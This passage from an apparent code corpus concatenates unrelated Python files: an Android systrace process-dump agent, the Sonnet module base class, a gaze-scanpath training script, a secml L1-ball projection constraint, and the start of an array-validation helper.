from devil.android.device_errors import AdbShellCommandFailedError
from systrace import tracing_agents
from systrace import trace_result
# Leftmost output columns match those used on legacy devices.
# Get thread names separately as there may be spaces that break column
# splitting.
# TODO(benm): Refactor device_utils.GetPids to get threads and use that here.
PS_COMMAND_PROC = "ps -A -o USER,PID,PPID,VSIZE,RSS,WCHAN,ADDR=PC,S,NAME,COMM" \
"&& ps -AT -o USER,PID,TID,CMD"
# Fallback for old devices.
PS_COMMAND_PROC_LEGACY = "ps && ps -t"
# identify this as trace of thread / process state
TRACE_HEADER = 'PROCESS DUMP\n'
def try_create_agent(config):
if config.target != 'android':
return None
if config.from_file is not None:
return None
return AndroidProcessDataAgent()
def get_config(options):
return options
class AndroidProcessDataAgent(tracing_agents.TracingAgent):
def __init__(self):
super(AndroidProcessDataAgent, self).__init__()
self._trace_data = ""
self._device = None
def __repr__(self):
return 'android_process_data'
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StartAgentTracing(self, config, timeout=None):
self._device = device_utils.DeviceUtils(config.device_serial_number)
self._trace_data += self._get_process_snapshot()
return True
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StopAgentTracing(self, timeout=None):
self._trace_data += self._get_process_snapshot()
return True
@py_utils.Timeout(tracing_agents.GET_RESULTS_TIMEOUT)
def GetResults(self, timeout=None):
result = TRACE_HEADER + self._trace_data
return trace_result.TraceResult('androidProcessDump', result)
def SupportsExplicitClockSync(self):
return False
def RecordClockSyncMarker(self, sync_id, did_record_sync_marker_callback):
pass
def _get_process_snapshot(self):
use_legacy = False
try:
dump = self._device.RunShellCommand( \
PS_COMMAND_PROC, check_return=True, as_root=True, shell=True)
except AdbShellCommandFailedError:
use_legacy = True
# Check length of 2 as we execute two commands, which in case of failure
# on old devices output 1 line each.
if use_legacy or len(dump) == 2:
logging.debug('Couldn\'t parse ps dump, trying legacy method ...')
dump = self._device.RunShellCommand( \
PS_COMMAND_PROC_LEGACY, check_return=True, as_root=True, shell=True)
if len(dump) == 2:
logging.error('Unable to extract process data!')
return ""
return '\n'.join(dump) + '\n'
|
py | 1a40aefa362ed1a451e9b56ebe9e48d09bda06be | # Copyright 2017 The Sonnet Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Base class for TensorFlow snt.
This file contains the Abstract Base Class for defining Modules in TensorFlow.
A Module is an object that can be connected into the Graph multiple times
using the __call__ method, sharing variables automatically with no need to
explicitly use scopes or specify reuse=True.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import contextlib
import inspect
import types
# Dependency imports
import contextlib2
import six
from sonnet.python.modules import base_info
from sonnet.python.modules import util
import tensorflow as tf
import wrapt
# Import error class from base_errors for backward compatibility.
from sonnet.python.modules.base_errors import Error
from sonnet.python.modules.base_errors import NotConnectedError
from sonnet.python.modules.base_errors import ParentNotBuiltError
from sonnet.python.modules.base_errors import IncompatibleShapeError
from sonnet.python.modules.base_errors import UnderspecifiedError
from sonnet.python.modules.base_errors import NotSupportedError
from sonnet.python.modules.base_errors import NotInitializedError
from sonnet.python.modules.base_errors import DifferentGraphError
from sonnet.python.modules.base_errors import ModuleInfoError
# pylint: enable=g-bad-import-order
# pylint: enable=unused-import
from tensorflow.python.framework import ops
_MODULE_STACK = []
_CONNECTION_OBSERVER_STACK = []
@contextlib.contextmanager
def observe_connections(observer):
"""Notifies the observer whenever any Sonnet module is connected to the graph.
If a module contains nested modules, the observer is notified once for each
nested module, followed by the containing module.
For example:
```python
def logging_observer(connected_subgraph):
logging.info(connected_subgraph.module.module_name)
with snt.observe_connections(logging_observer):
output = imagenet_module(input_tensor)
```
Args:
observer: Callable accepting a single argument. Will be called with a
`ConnectedSubGraph` each time a module is connected to the graph.
Yields:
None: just yields control to the inner context.
"""
_CONNECTION_OBSERVER_STACK.append(observer)
try:
yield
finally:
_CONNECTION_OBSERVER_STACK.pop()
@six.add_metaclass(abc.ABCMeta)
class AbstractModule(object):
"""Superclass for Sonnet Modules.
This class defines the functionality that every module should implement,
principally the `build` method which is wrapped using `tf.make_template`
and called from `__call__`. Every time the module is called it will
be connected into the graph but using the same shared set of variables, thanks
to the template.
For this to work correctly, the `build` implementation in the derived class
must access all variables using `tf.get_variable`, not `tf.Variable`. The same
set of variables must be created each time, if this is not the case an Error
will be raised.
Every subclass must call this class' `__init__` at the start of their
`__init__`, passing the relevant name. If this step is omitted variable
sharing will not work.
"""
def __init__(self, _sentinel=None, custom_getter=None,
name=None): # pylint: disable=invalid-name
"""Performs the initialisation necessary for all AbstractModule instances.
Every subclass of AbstractModule must begin their constructor with a call to
this constructor, i.e.
`super(MySubModule, self).__init__(custom_getter=custom_getter, name=name)`.
If you instantiate sub-modules in __init__ you must create them within the
`_enter_variable_scope` context manager to ensure they are in the module's
variable scope. Alternatively, instantiate sub-modules in `_build`.
Args:
_sentinel: Variable that only carries a non-None value if `__init__` was
called without named parameters. If this is the case, a deprecation
warning is issued in form of a `ValueError`.
custom_getter: Callable or dictionary of callables to use as
custom getters inside the module. If a dictionary, the keys
correspond to regexes to match variable names. See the `tf.get_variable`
documentation for information about the custom_getter API.
name: Name of this module. Used to construct the Templated build function.
If `None` the module's class name is used (converted to snake case).
Raises:
TypeError: If `name` is not a string.
TypeError: If a given `custom_getter` is not callable.
ValueError: If `__init__` was called without named arguments.
"""
if _sentinel is not None:
raise ValueError("Calling AbstractModule.__init__ without named "
"arguments is not supported.")
if name is None:
name = util.to_snake_case(self.__class__.__name__)
elif not isinstance(name, six.string_types):
raise TypeError("Name must be a string, not {} of type {}.".format(
name, type(name)))
self._is_connected = False
self._connected_subgraphs = []
# If the given custom getter is a dictionary with a per-variable custom
# getter, wrap it into a single custom getter.
if isinstance(custom_getter, collections.Mapping):
self._custom_getter = util.custom_getter_router(
custom_getter_map=custom_getter,
name_fn=lambda name: name[len(self.scope_name) + 1:])
elif custom_getter is not None and not callable(custom_getter):
raise TypeError("Given custom_getter is not callable.")
else:
self._custom_getter = custom_getter
self._template = tf.make_template(name,
self._build_wrapper,
create_scope_now_=True,
custom_getter_=self._custom_getter)
self._original_name = name
self._unique_name = self._template.variable_scope.name.split("/")[-1]
# Copy signature of _build to __call__.
adapter_fn = getattr(self._build, "__func__", self._build)
@wrapt.decorator(adapter=adapter_fn)
def copy_signature(method, unused_instance, args, kwargs):
return method(*args, **kwargs)
@copy_signature
def __call__(instance, *args, **kwargs): # pylint: disable=invalid-name
return AbstractModule.__call__(instance, *args, **kwargs)
# use __dict__ instead of setting directly to avoid a Callable pytype error
self.__dict__["__call__"] = types.MethodType(__call__, self)
# Update __call__ and the object docstrings to enable better introspection.
self.__doc__ = self._build.__doc__
self.__call__.__func__.__doc__ = self._build.__doc__
# Keep track of which graph this module has been connected to. Sonnet
# modules cannot be connected to multiple graphs, as transparent variable
# sharing is impossible in that case.
self._graph = None
# Container for all variables created in this module and its sub-modules.
self._all_variables = set([])
# Calling `.defun()` causes the module's call method to become wrapped as
# a graph function.
self._defun_wrapped = False
def _build_wrapper(self, *args, **kwargs):
"""Function which will be wrapped in a Template to do variable sharing.
Passes through all arguments to the _build method, and returns the
corresponding outputs, plus the name_scope generated by this call of the
template.
Args:
*args: args list for self._build
**kwargs: kwargs dict for self._build
Returns:
A tuple containing (output from _build, scope_name).
"""
output = self._build(*args, **kwargs)
# Make a dummy subscope to check the name scope we are in. We could read
# the name scope from one of the outputs produced, except that the outputs
# could have been produced from a subscope instantiated by the build
# function, for example if inner modules are present. Calling name_scope
# here and creating a new subscope guarantees we get the right answer.
    # Because we don't create any ops inside this dummy scope, no extra memory
# will be consumed.
with tf.name_scope("dummy") as scope_name:
this_scope_name = scope_name[:-len("/dummy/")]
return output, this_scope_name
def _check_init_called(self):
"""Checks that the base class's __init__ method has been called.
Raises:
NotInitializedError: `AbstractModule.__init__` has not been called.
"""
try:
self._template
except AttributeError:
raise NotInitializedError("You may have forgotten to call super at the "
"start of %s.__init__."
% self.__class__.__name__)
def _set_module_info(self):
"""Creates a `ModuleInfo` and adds it to the graph collections."""
self._module_info = base_info.ModuleInfo(
module_name=self.module_name,
scope_name=self.scope_name,
class_name="{}.{}".format(
self.__class__.__module__, self.__class__.__name__),
connected_subgraphs=self._connected_subgraphs)
self._graph.add_to_collection(base_info.SONNET_COLLECTION_NAME,
self._module_info)
def _check_same_graph(self):
"""Checks that the module is not being connect to multiple Graphs.
An instance of a Sonnet module 'owns' the variables it contains, and permits
seamless variable sharing. As such, connecting a single module instance to
multiple Graphs is not possible - this function will raise an error should
that occur.
Raises:
DifferentGraphError: if the module is connected to a different Graph than
it was previously used in.
"""
with ops.init_scope():
      # We need `init_scope` in case we're running inside a defun. In that case
# what we want is information about where the function will be called not
# where the function is being built.
current_graph = tf.get_default_graph()
will_call_in_eager_context = tf.executing_eagerly()
if self._graph is None:
self._graph = current_graph
self._set_module_info()
if not will_call_in_eager_context:
# Same graph checks only make sense when calling from graph mode (in eager
# mode there is a single process level context where all modules are
# created).
if self._graph != current_graph:
raise DifferentGraphError("Cannot connect module to multiple Graphs.")
@abc.abstractmethod
def _build(self, *args, **kwargs):
"""Add elements to the Graph, computing output Tensors from input Tensors.
Subclasses must implement this method, which will be wrapped in a Template.
Args:
*args: Input Tensors.
**kwargs: Additional Python flags controlling connection.
Returns:
output Tensor(s).
"""
@contextlib.contextmanager
def _capture_variables(self):
"""Adds variables used by this module to self._all_variables.
Upon entering this context manager the module adds itself onto the top
of the module call stack. Any variables created with `tf.get_variable()`
inside `_build()` or `_enter_variable_scope()` while this module is on top
of the call stack will be added to `self._all_variables`.
Before exiting the context the module removes itself from the top of the
call stack, and adds all of the variables in `self._all_variables` to its
parent module (the new top) of the call stack.
Yields:
Nothing, the yield just transfers focus back to the inner context.
"""
_MODULE_STACK.append(self)
try:
with contextlib2.ExitStack() as stack:
# Ideally move re-entering store into Template.variable_scope.
template_store = getattr(self._template, "_template_store", None)
if template_store is not None:
# In eager mode, the template store keeps references to created
# variables such that they survive even if there are no references to
# them in Python code. Variables added to an eager template store are
# also added to TensorFlow global collections (unlike regular
# variables created in eager mode).
stack.enter_context(template_store.as_default())
stack.enter_context(
util.notify_about_variables(self._all_variables.add))
yield
finally:
# Remove `self` from `module_stack`, this happens as part of cleanup
# even if an error is raised.
_MODULE_STACK.pop()
if _MODULE_STACK:
# Peek into the stack to add created variables to the parent
parent_module = _MODULE_STACK[-1]
parent_module._all_variables.update(self._all_variables) # pylint: disable=protected-access
def _add_connected_subgraph(self, call_method, outputs, subgraph_name_scope,
*inputs_args, **inputs_kwargs):
"""Adds a newly connected subgraph.
Args:
call_method: the function used to connect this Sonnet module to the graph.
outputs: `call_method` outputs.
subgraph_name_scope: name scope of the newly connected subgraph.
*inputs_args: `self._build` inputs `*args`.
**inputs_kwargs: `self._build` inputs `*kwargs`.
"""
build_inputs = inspect.getcallargs(call_method,
*inputs_args, **inputs_kwargs)
# "self" should normally be in `build_inputs` but some people are decorating
# their `_build` function with `memoize`, in which case the function
# signature doesn't contain `self` anymore.
if "self" in build_inputs:
del build_inputs["self"]
connected_subgraph = base_info.ConnectedSubGraph(
module=self, name_scope=subgraph_name_scope,
inputs=build_inputs,
outputs=outputs)
self._connected_subgraphs.append(connected_subgraph)
for observer in _CONNECTION_OBSERVER_STACK:
observer(connected_subgraph)
@property
def defun_wrapped(self):
"""Returns boolean indicating whether this module is defun wrapped."""
return self._defun_wrapped
def defun(self):
"""Wraps this modules call method in a callable graph function."""
if not self._defun_wrapped:
self._defun_wrapped = True
self._call = tf.contrib.eager.defun(self._call)
def __call__(self, *args, **kwargs):
return self._call(*args, **kwargs)
def _call(self, *args, **kwargs):
"""Entry point when a module is called to connect it to the graph.
This is the entry point when users connect a Module into the Graph. The
underlying _build method will have been wrapped in a Template by the
constructor, and we call this template with the provided inputs here.
Note we use `_call` instead of `__call__` to allow instance level monkey
patching (see `defun`).
Args:
*args: Arguments for underlying _build method.
**kwargs: Keyword arguments for underlying _build method.
Returns:
The result of the underlying _build method.
"""
self._check_init_called()
self._check_same_graph()
with self._capture_variables():
outputs, subgraph_name_scope = self._template(*args, **kwargs)
self._is_connected = True
if not tf.executing_eagerly():
# In eager mode the module is called a lot more frequently than in graph
# mode (for each training step) and so we don't keep track of connected
# subgraphs (since there will be orders of magnitude more of them).
self._add_connected_subgraph(self._build, outputs, subgraph_name_scope,
*args, **kwargs)
return outputs
@property
def name_scopes(self):
"""Returns a tuple of all name_scopes generated by this module."""
if tf.executing_eagerly():
raise NotSupportedError(
"The name_scopes property is not supported in eager mode.")
return tuple(subgraph.name_scope for subgraph in self._connected_subgraphs)
@property
def variable_scope(self):
"""Returns the variable_scope declared by the module.
It is valid for library users to access the internal templated
variable_scope, but only makes sense to do so after connection. Therefore we
raise an error here if the variable_scope is requested before connection.
The only case where it does make sense to access the variable_scope before
connection is to get the post-uniquification name, which we support using
the separate .scope_name property.
Returns:
variable_scope: `tf.VariableScope` instance of the internal `tf.Template`.
Raises:
NotConnectedError: If the module is not connected to the Graph.
"""
self._ensure_is_connected()
return self._template.variable_scope
@property
def scope_name(self):
"""Returns the full name of the Module's variable scope."""
return self._template.variable_scope.name
@property
def module_name(self):
"""Returns the name of the Module."""
return self._unique_name
@property
def is_connected(self):
"""Returns true iff the Module been connected to the Graph at least once."""
return self._is_connected
@property
def graph(self):
"""Returns the Graph instance which the module is connected to, or None."""
return self._graph
@property
def connected_subgraphs(self):
"""Returns the subgraphs created by this module so far."""
if tf.executing_eagerly():
raise NotSupportedError(
"Connected sub-graphs are not tracked in eager mode.")
return tuple(self._connected_subgraphs)
@property
def last_connected_subgraph(self):
"""Returns the last subgraph created by this module.
Returns:
The last connected subgraph.
Raises:
NotConnectedError: If the module is not connected to the Graph.
"""
if tf.executing_eagerly():
raise NotSupportedError(
"Connected sub-graphs are not tracked in eager mode.")
self._ensure_is_connected()
return self._connected_subgraphs[-1]
@classmethod
def get_possible_initializer_keys(cls):
"""Returns the keys the dictionary of variable initializers may contain.
This provides the user with a way of knowing the initializer keys that are
available without having to instantiate a sonnet module. Subclasses may
override this class method if they need additional arguments to determine
what initializer keys may be provided.
Returns:
Set with strings corresponding to the strings that may be passed to the
constructor.
"""
return getattr(cls, "POSSIBLE_INITIALIZER_KEYS", set())
def _ensure_is_connected(self):
"""Raise an Error if the module has not been connected yet.
Until the module is connected into the Graph, any variables created do
not exist yet and cannot be created in advance due to not knowing the size
of the input Tensor(s). This assertion ensures that any variables contained
in this module must now exist.
Raises:
NotConnectedError: If the module is not connected to the Graph.
"""
if not self.is_connected:
raise NotConnectedError(
"Variables in {} not instantiated yet, __call__ the module "
"first.".format(self.scope_name))
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def _enter_variable_scope(self, reuse=None, check_same_graph=True):
"""Returns a contextlib.contextmanager to enter the internal variable scope.
This is useful for situations where submodules must be declared in the
constructor, or somewhere else that is not called under the `_build` method.
If such a case arises, calling `with self._enter_variable_scope():` will
cause the variables in the submodule to be correctly scoped.
An example justification for this is to allow the `Transposable` interface
to be implemented - you might want to construct all the submodules at
construction time so that you can call `.transpose()` and connect the
result of that before connecting the non-transposed module.
```python
class SomeModule(snt.AbstractModule):
def __init__(self, name="some_module"):
super(SomeModule, self).__init__(name=name)
with self._enter_variable_scope():
# We need to construct this submodule before we get to the _build
# method, for some reason.
self._sub_mod = snt.SomeSubmodule(name="some_submodule")
def _build(self, input):
# Connect to the already constructed submodule.
return self._sub_mod(input)
```
If you omit this then the submodule and parent module will appear to
be "side by side" rather than nested when viewed in the Graph viewer, and
functions such as `snt.get_variables_in_module()` or the `get_variables()`
method will not know about variables defined in the submodule.
Args:
reuse: Boolean passed to `tf.variable_scope`.
check_same_graph: Boolean to determine if same graph check should run. If
you are only entering the scope to name other variable scopes (e.g. not
to create/reuse variables) then it is legitimate to set this to False.
Yields:
The variable_scope inside the template.
"""
self._check_init_called()
if check_same_graph:
self._check_same_graph()
with self._capture_variables():
with tf.variable_scope(self._template.variable_scope, reuse=reuse) as vs:
yield vs
# pylint: enable=g-doc-return-or-yield
@property
def variables(self):
"""**All** `tf.Variable`s used when the module is connected.
This property does not rely on global collections and should generally be
preferred vs. `get_variables` and `get_all_variables`.
See the documentation for `AbstractModule._capture_variables()` for more
information about what variables are captured.
Returns:
A sorted (by variable name) tuple of `tf.Variable` objects.
Raises:
NotConnectedError: If the module is not connected to the Graph.
"""
self._ensure_is_connected()
return util.sort_by_name(self._all_variables)
@property
def trainable_variables(self):
"""All **trainable** `tf.Variable`s used when the module is connected.
This property does not rely on global collections and should generally be
preferred vs. `get_variables` and `get_all_variables`.
See the documentation for `AbstractModule._capture_variables()` for more
information about what variables are captured.
Returns:
A sorted (by variable name) tuple of `tf.Variable` objects.
Raises:
NotConnectedError: If the module is not connected to the Graph.
"""
return tuple(v for v in self.variables if v.trainable)
@property
def non_trainable_variables(self):
"""All **non-trainable** `tf.Variable`s used when the module is connected.
This property does not rely on global collections and should generally be
preferred vs. `get_variables` and `get_all_variables`.
See the documentation for `AbstractModule._capture_variables()` for more
information about what variables are captured.
Returns:
A sorted (by variable name) tuple of `tf.Variable` objects.
Raises:
NotConnectedError: If the module is not connected to the Graph.
"""
return tuple(v for v in self.variables if not v.trainable)
def get_variables(self, collection=tf.GraphKeys.TRAINABLE_VARIABLES):
"""Returns tuple of `tf.Variable`s declared inside this module.
Note that this operates by searching this module's variable scope,
and so does not know about any modules that were constructed elsewhere but
used inside this module.
This method explicitly re-enters the Graph which this module has been
connected to.
Args:
collection: Collection to restrict query to. By default this is
        `tf.GraphKeys.TRAINABLE_VARIABLES`, which doesn't include non-trainable
variables such as moving averages.
Returns:
A tuple of `tf.Variable` objects.
Raises:
NotConnectedError: If the module is not connected to the Graph.
"""
self._ensure_is_connected()
# Explicitly re-enter Graph, in case the module is being queried with a
# different default Graph from the one it was connected to. If this was not
# here then querying the variables from a different graph scope would
# produce an empty tuple.
with self._graph.as_default():
return util.get_variables_in_scope(
self.variable_scope, collection=collection)
def get_all_variables(self, collection=tf.GraphKeys.TRAINABLE_VARIABLES):
"""Returns all `tf.Variable`s used when the module is connected.
See the documentation for `AbstractModule._capture_variables()` for more
information.
Args:
collection: Collection to restrict query to. By default this is
        `tf.GraphKeys.TRAINABLE_VARIABLES`, which doesn't include non-trainable
variables such as moving averages.
Returns:
A sorted (by variable name) tuple of `tf.Variable` objects.
Raises:
NotConnectedError: If the module is not connected to the Graph.
"""
self._ensure_is_connected()
collection_variables = set(tf.get_collection(collection))
# Return variables in self._all_variables that are in `collection`
return util.sort_by_name(self._all_variables & collection_variables)
def __getstate__(self):
raise NotSupportedError(
"Sonnet AbstractModule instances cannot be serialized. You should "
"instead serialize all necessary configuration which will allow "
"modules to be rebuilt.")
@six.add_metaclass(abc.ABCMeta)
class Transposable(object):
"""Transposable module interface.
The Transposable interface requires that transposable modules implement
a method called `transpose`, returning a module that is the transposed
version of the one the method is called on.
Calling the method twice should return a module with the same specifications
as the original module.
When implementing a transposable module, special care is required to make
sure that parameters needed to instantiate the module are provided as
functions whose invocation is deferred to graph construction time.
For example, in Linear we might want to call:
```python
linear = snt.Linear(name="linear", output_size=output_size)
linear_transpose = linear.transpose()
```
where the output_size for linear_transpose is not known yet, as linear is
not yet connected to the graph: output_size is passed to linear_transpose's
constructor as a lambda returning linear.input_size. The lambda will return
the correct value once linear is given an input.
Notice that linear_transpose's output_size value does not need to be defined
until the module is connected to the graph.
"""
@abc.abstractmethod
def transpose(self, name=None, **kwargs):
"""Builds and returns transposed version of module.
Args:
name: Name of the transposed module.
**kwargs: Additional Python flags controlling transposition.
Returns:
Transposed version of the module.
"""
@abc.abstractmethod
def input_shape(self):
"""Returns shape of input `Tensor` passed at last call to `build`."""
class Module(AbstractModule):
"""Module wrapping a function provided by the user."""
def __init__(self, build, custom_getter=None, name=None):
"""Constructs a module with a given build function.
The Module class can be used to wrap a function assembling a network into a
module.
For example, the following code implements a simple one-hidden-layer MLP
model by defining a function called make_model and using a Module instance
to wrap it.
```python
def make_model(inputs):
lin1 = snt.Linear(name="lin1", output_size=10)(inputs)
relu1 = tf.nn.relu(lin1, name="relu1")
lin2 = snt.Linear(name="lin2", output_size=20)(relu1)
return lin2
model = snt.Module(name='simple_mlp', build=make_model)
outputs = model(inputs)
```
The `partial` package from `functools` can be used to bake configuration
parameters into the function at construction time, as shown in the following
example.
```python
from functools import partial
def make_model(inputs, output_sizes):
lin1 = snt.Linear(name="lin1", output_size=output_sizes[0])(inputs)
relu1 = tf.nn.relu(lin1, name="relu1")
lin2 = snt.Linear(name="lin2", output_size=output_sizes[1])(relu1)
return lin2
model = snt.Module(name='simple_mlp',
                       build=partial(make_model, output_sizes=[10, 20]))
outputs = model(inputs)
```
Args:
build: Callable to be invoked when connecting the module to the graph.
The `build` function is invoked when the module is called, and its
role is to specify how to add elements to the Graph, and how to
compute output Tensors from input Tensors.
The `build` function signature can include the following parameters:
*args - Input Tensors.
**kwargs - Additional Python parameters controlling connection.
custom_getter: Callable or dictionary of callables to use as
custom getters inside the module. If a dictionary, the keys
correspond to regexes to match variable names. See the
`tf.get_variable` documentation for information about the
custom_getter API.
name: Module name. If set to `None` (the default), the name will be set to
that of the `build` callable converted to `snake_case`. If `build` has
no name, the name will be 'module'.
Raises:
TypeError: If build is not callable.
TypeError: If a given `custom_getter` is not callable.
"""
if not callable(build):
raise TypeError("Input 'build' must be callable.")
if name is None:
name = util.name_for_callable(build)
super(Module, self).__init__(custom_getter=custom_getter, name=name)
self._build_function = build
def _build(self, *args, **kwargs):
"""Forwards call to the passed-in build function."""
return self._build_function(*args, **kwargs)
|
py | 1a40af03a7129d5edcd377f19b3f8d82faa5be24 | """Train script.
Usage:
train.py <hparams> <dataset_root> [--cuda=<id>]
train.py -h | --help
Options:
-h --help Show this screen.
    --cuda=<id>  ID of the CUDA device to use [default: 0].
"""
import torch
import numpy as np
from docopt import docopt
from os.path import join
from irl_dcb.config import JsonConfig
from dataset import process_data
from irl_dcb.builder import build
from irl_dcb.trainer import Trainer
torch.manual_seed(42619)
np.random.seed(42619)
if __name__ == '__main__':
args = docopt(__doc__)
device = torch.device('cuda:{}'.format(args['--cuda']))
hparams = args["<hparams>"]
dataset_root = args["<dataset_root>"]
hparams = JsonConfig(hparams)
# dir of pre-computed beliefs
DCB_dir_HR = join(dataset_root, 'DCBs/HR/')
DCB_dir_LR = join(dataset_root, 'DCBs/LR/')
data_name = '{}x{}'.format(hparams.Data.im_w, hparams.Data.im_h)
# bounding box of the target object (for scanpath ratio evaluation)
bbox_annos = np.load(join(dataset_root,
'coco_search_annos_{}.npy'.format(data_name)),
allow_pickle=True).item()
# load ground-truth human scanpaths
fixation_path = join(dataset_root,
'processed_human_scanpaths_TP_trainval.npy')
human_scanpaths = np.load(fixation_path,
allow_pickle=True,
encoding='latin1')
# exclude incorrect scanpaths
if hparams.Train.exclude_wrong_trials:
human_scanpaths = list(filter(lambda x: x['correct'] == 1,
human_scanpaths))
# process fixation data
dataset = process_data(human_scanpaths, DCB_dir_HR, DCB_dir_LR, bbox_annos,
hparams)
built = build(hparams, True, device, dataset['catIds'])
trainer = Trainer(**built, dataset=dataset, device=device, hparams=hparams)
trainer.train()
|
py | 1a40af86cbe268faa8ca156a8b3eea1ff9b91d83 | #!/usr/bin/python3
import subprocess
import time
import os
while True:
# cloudkey = os.path.isfile('cloud.key.hacklab')
# print(cloudkey)
# if not (cloudkey):
os.system('python3 dragonfly_public_cloud.py') |
py | 1a40af8ea6ce3771a46b47a9d698f81a0ba66bc3 | """
.. module:: CConstraintL1
:synopsis: L1 Constraint
.. moduleauthor:: Battista Biggio <[email protected]>
.. moduleauthor:: Ambra Demontis <[email protected]>
"""
from secml.array import CArray
from secml.optim.constraints import CConstraint
class CConstraintL1(CConstraint):
"""L1 Constraint.
Parameters
----------
center : scalar or CArray, optional
Center of the constraint. Use an array to specify a different
value for each dimension. Default 0.
radius : scalar, optional
The semidiagonal of the constraint. Default 1.
Attributes
----------
class_type : 'l1'
"""
__class_type = 'l1'
def __init__(self, center=0, radius=1):
super(CConstraintL1, self).__init__()
self.center = center
self.radius = radius
@property
def center(self):
"""Center of the constraint."""
return self._center
@center.setter
def center(self, value):
"""Center of the constraint."""
self._center = CArray(value)
@property
def radius(self):
"""Semidiagonal of the constraint."""
return self._radius
@radius.setter
def radius(self, value):
"""Semidiagonal of the constraint."""
self._radius = float(value)
def _constraint(self, x):
"""Returns the value of the constraint for the sample x.
The constraint value y is given by:
y = ||x - center||_1 - radius
Parameters
----------
x : CArray
Input array.
Returns
-------
float
Value of the constraint.
"""
return float((x - self.center).norm(order=1) - self.radius)
def _projection(self, x):
"""Project x onto feasible domain / within the given constraint.
Solves the optimisation problem (using the algorithm from [1]):
min_w 0.5 * || w - x ||_2^2 , s.t. || w ||_1 <= s
Parameters
----------
x : CArray
Input sample.
Returns
-------
CArray
Projected x onto feasible domain if constraint is violated.
Notes
-----
Solves the problem by a reduction to the positive simplex case.
"""
s = float(self.radius)
v = (x - self.center).ravel()
# compute the vector of absolute values
u = abs(v)
# check if v is already a solution
if u.sum() <= s:
# l1-norm is <= s
out = v + self._center
return out.tosparse() if x.issparse else out
# v is not already a solution: optimum lies on the boundary (norm == s)
# project *u* on the simplex
w = self._euclidean_proj_simplex(u, s=s)
# compute the solution to the original problem on v
w *= v.sign()
out = w + self._center
return out.tosparse() if x.issparse else out
def _euclidean_proj_simplex(self, v, s=1):
"""Compute the Euclidean projection on a positive simplex.
Solves the optimisation problem (using the algorithm from [1]):
min_w 0.5 * || w - v ||_2^2 ,
s.t. \\sum_i w_i = s, w_i >= 0
Parameters
----------
v : CArray
1-Dimensional vector
s : int, optional
Radius of the simplex. Default 1.
Returns
-------
w : CArray
Euclidean projection of v on the simplex.
Notes
-----
The complexity of this algorithm is in O(n log(n)) as it involves
sorting v. Better alternatives exist for high-dimensional sparse
vectors (cf. [1]). However, this implementation still easily
scales to millions of dimensions.
References
----------
[1] Efficient Projections onto the l1-Ball for
Learning in High Dimensions
John Duchi, Shai Shalev-Shwartz, Yoram Singer,
and Tushar Chandra.
International Conference on Machine Learning (ICML 2008)
http://www.cs.berkeley.edu/~jduchi/projects/DuchiSiShCh08.pdf
"""
v = CArray(v).ravel()
d = v.size
# check if we are already on the simplex
if v.sum() == s and (v >= 0).sum() == d:
return v # best projection: itself!
# get the array of cumulative sums of a sorted (decreasing) copy of v
u = v.deepcopy()
u.sort(inplace=True)
u = u[::-1]
if u.issparse:
u_nnz = CArray(u.nnz_data).todense()
cssv = u_nnz.cumsum()
else:
cssv = u.cumsum()
# get the number of > 0 components of the optimal solution
        # (only considering non-null elements in v)
j = CArray.arange(1, cssv.size+1)
if u.issparse:
rho = (j * u_nnz > (cssv - s)).sum() - 1
else:
rho = (j * u > (cssv - s)).sum() - 1
# compute the Lagrange multiplier associated to the simplex constraint
theta = (cssv[rho] - s) / (rho + 1.0)
# compute the projection by thresholding v using theta
w = v
if w.issparse:
p = CArray(w.nnz_data)
p -= theta
w[w.nnz_indices] = p
else:
w -= theta
w[w < 0] = 0
return w
def _gradient(self, x):
"""Returns the gradient of c(x) in x.
Parameters
----------
x : CArray
Input sample.
Returns
-------
CArray
The gradient of the constraint computed on x.
"""
return (x - self.center).sign().ravel()
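# Minimal usage sketch (comments only; it assumes the CConstraint base class
# exposes the public projection()/constraint() wrappers around the private
# methods above, and that secml is installed):
#   c = CConstraintL1(center=0, radius=1)
#   x = CArray([0.7, -0.9])        # ||x||_1 = 1.6 > radius, so x is infeasible
#   x_proj = c.projection(x)       # projected back onto the l1 ball
#   assert c.constraint(x_proj) <= 1e-9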
|
py | 1a40affab087804e3786722e9b67d81cd70a4139 | import warnings
from typing import Any, Callable, Hashable, List, Mapping, Optional, Set, Tuple, Union
import numpy as np
from numba import guvectorize
from xarray import Dataset
from . import variables
from .typing import ArrayLike, DType
def check_array_like(
a: Any,
dtype: Union[None, DType, Set[DType]] = None,
kind: Union[None, str, Set[str]] = None,
ndim: Union[None, int, Set[int]] = None,
) -> None:
"""Raise an error if an array does not match given attributes (dtype, kind, dimensions).
Parameters
----------
a
Array of any type.
dtype
The dtype the array must have, by default None (don't check)
If a set, then the array must have one of the dtypes in the set.
kind
The dtype kind the array must be, by default None (don't check).
If a set, then the array must be one of the kinds in the set.
ndim
Number of dimensions the array must have, by default None (don't check)
If a set, then the array must have one of the number of dimensions in the set.
Raises
------
TypeError
        * If `a` does not have the attributes `dtype`, `shape`, and `ndim`.
* If `a` does not have a dtype that matches `dtype`.
* If `a` is not a dtype kind that matches `kind`.
ValueError
If the number of dimensions of `a` does not match `ndim`.
"""
array_attrs = "ndim", "dtype", "shape"
for k in array_attrs:
if not hasattr(a, k):
raise TypeError(f"Not an array. Missing attribute '{k}'")
if dtype is not None:
if isinstance(dtype, set):
dtype = {np.dtype(t) for t in dtype}
if a.dtype not in dtype:
raise TypeError(
f"Array dtype ({a.dtype}) does not match one of {dtype}"
)
elif a.dtype != np.dtype(dtype):
raise TypeError(f"Array dtype ({a.dtype}) does not match {np.dtype(dtype)}")
if kind is not None:
if isinstance(kind, set):
if a.dtype.kind not in kind:
raise TypeError(
f"Array dtype kind ({a.dtype.kind}) does not match one of {kind}"
)
elif a.dtype.kind != kind:
raise TypeError(f"Array dtype kind ({a.dtype.kind}) does not match {kind}")
if ndim is not None:
